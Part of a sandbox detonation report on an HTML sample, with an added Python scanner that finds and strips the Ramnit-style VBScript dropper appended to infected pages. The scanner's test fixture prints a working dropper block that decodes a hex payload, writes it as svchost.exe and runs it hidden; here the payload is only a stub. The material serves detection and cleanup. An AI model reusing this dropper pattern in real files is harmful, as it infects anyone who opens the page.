MD5 0fddc99f343e9f8ff114271d53bbedbf
SHA1 78819f24425ed9912e05f8cb233ac13849cdcaed
SHA256 56235d8424ec4d6b9d3c479f65e49d45a4efa85bbf2e7862d31a1c4476c23388
SHA512 9406f3b27df7b6ae45cb0c5ffcf8e524997557c04d2ebf889691a4cba69a6e213d92317cba606b9687be450a2ff22c15a5536cc0a95ef64f6446370a7ef31c14

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fbf03bcc81d06e9482ade767b887f42c
SHA1 ca949e087b29dd6eca5f55e3bbbf4c7f625a2253
SHA256 8e059499a99d7bb9a478d0dffbc5774d0ba33ad272dd04ab94b7dbbf94b43c6e
SHA512 31566880089f9c612b1fb0146299083246dc9069415b57769d86878e16d54e2fab95a7dbe0a0b70a1011120fd4ef9f442be690e95c94fbed7e9b5fb86b756f23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2a02dec2c70d856d3a91e61cb0ffeb82
SHA1 3839d8c87f5acc803e5614daec11f2b5f5e20720
SHA256 6bc6f8dd94937c2f5722c8fbdf63ba5f0fda9d7f50939a66a740dc6bf1e4f6a7
SHA512 cf4b377324842949e731cfb21a85d380407adf6211b12c3c24c3bf1b6c1d1ee1f146501ec6ba053251cd6e0e7c9ef4d8046683bbdc1b9ca6e5cdde9ee32ce776
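The sample is an .html file, and in the Win7 run opening it in Internet Explorer ended with C:\Users\Admin\AppData\Local\Temp\svchost.exe (hashes at the top of this Files section) being written and executed. That matches the way Ramnit infects HTML files: it appends a VBScript block that stores an executable as a hex string, writes it to the temp folder under a name such as svchost.exe and runs it. It also fits the behavioral2 run below, where the same file opened in Microsoft Edge produced no signatures, since Edge does not execute VBScript. The report does not show the HTML itself, so whether this sample carries exactly that block is an assumption. The scanner below is an added example, not code from the report or from any vendor: it detects the block, reports the drop name and whether the hex payload is a PE, and strips the block to restore the original page. The fixture is constructed, with a 16-byte stub in place of a real payload.

```python
"""Find (and optionally clean) HTML files carrying the VBScript dropper that
Ramnit appends to .html files it infects.

Added example; not part of the sandbox report. The pattern is the publicly
documented Ramnit HTML infector; the fixture below is constructed and its
"payload" is a 16-byte stub that merely begins with the MZ header.
"""
import hashlib
import os
import re

# Constructed fixture: an ordinary page with a Ramnit-style block appended.
# In a real infection WriteData holds the whole PE as hex (hundreds of KB).
INFECTED_HTML = r"""<html><body><h1>Quarterly report</h1></body></html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
"""
CLEAN_HTML = "<html><body><p>nothing to see</p></body></html>\n"

SCRIPT_RE = re.compile(r'<SCRIPT\s+Language\s*=\s*"?VBScript"?\s*>(.*?)</SCRIPT>', re.I | re.S)
DROPNAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]+)"', re.I)
WRITEDATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]*)"', re.I)


def is_dropper(block):
    """Treat a VBScript block as the Ramnit dropper only when it carries both
    the drop name and a hex payload; one of the names on its own is not enough."""
    return bool(DROPNAME_RE.search(block) and WRITEDATA_RE.search(block))


def scan_html(html):
    """Return details of the first dropper block found, or None if clean."""
    for block in SCRIPT_RE.findall(html):
        if not is_dropper(block):
            continue
        hexdata = WRITEDATA_RE.search(block).group(1)
        payload = bytes.fromhex(hexdata) if len(hexdata) % 2 == 0 else b""
        return {
            "drop_name": DROPNAME_RE.search(block).group(1),
            "payload_len": len(payload),
            "is_pe": payload[:2] == b"MZ",
            "payload_sha256": hashlib.sha256(payload).hexdigest(),
            "runs_payload": re.search(r"\.Run\s+DropPath", block, re.I) is not None,
        }
    return None


def disinfect(html):
    """Remove dropper blocks. Ramnit appends them after the original markup,
    so removing the block restores the page; clean input is returned unchanged."""
    return SCRIPT_RE.sub(lambda m: "" if is_dropper(m.group(1)) else m.group(0), html)


def scan_tree(root):
    """Yield (path, details) for every infected .htm/.html file under root."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".htm", ".html")):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hit = scan_html(fh.read())
                if hit:
                    yield path, hit


if __name__ == "__main__":
    print(scan_html(INFECTED_HTML))   # dict with drop_name "svchost.exe", is_pe True
    print(scan_html(CLEAN_HTML))      # None
```

Because Ramnit writes the same block into every HTML file it can reach, scan_tree over a user profile or file share is the practical way to size an incident; the payload_sha256 of each hit can then be compared against the svchost.exe hashes listed above to confirm they are the same dropper. disinfect is only safe when the original markup is intact ahead of the block, which is the case for the appending infector but should be verified by diffing before and after.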

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 04:52

Reported

2024-05-31 04:55

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

152s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\8605e735f755b19186b654efc2857890_JaffaCakes118.html

Signatures

N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\8605e735f755b19186b654efc2857890_JaffaCakes118.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3716 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=4620 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5364 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5532 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5776 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 23.73.139.27:443 bzib.nelreports.net tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 158.6.107.13.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:443 www.microsoft.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 27.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 104.242.140.51.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 29.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
BE 88.221.83.227:443 www.bing.com tcp
US 8.8.8.8:53 227.83.221.88.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
BE 88.221.83.234:443 www.bing.com tcp
US 8.8.8.8:53 234.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

N/A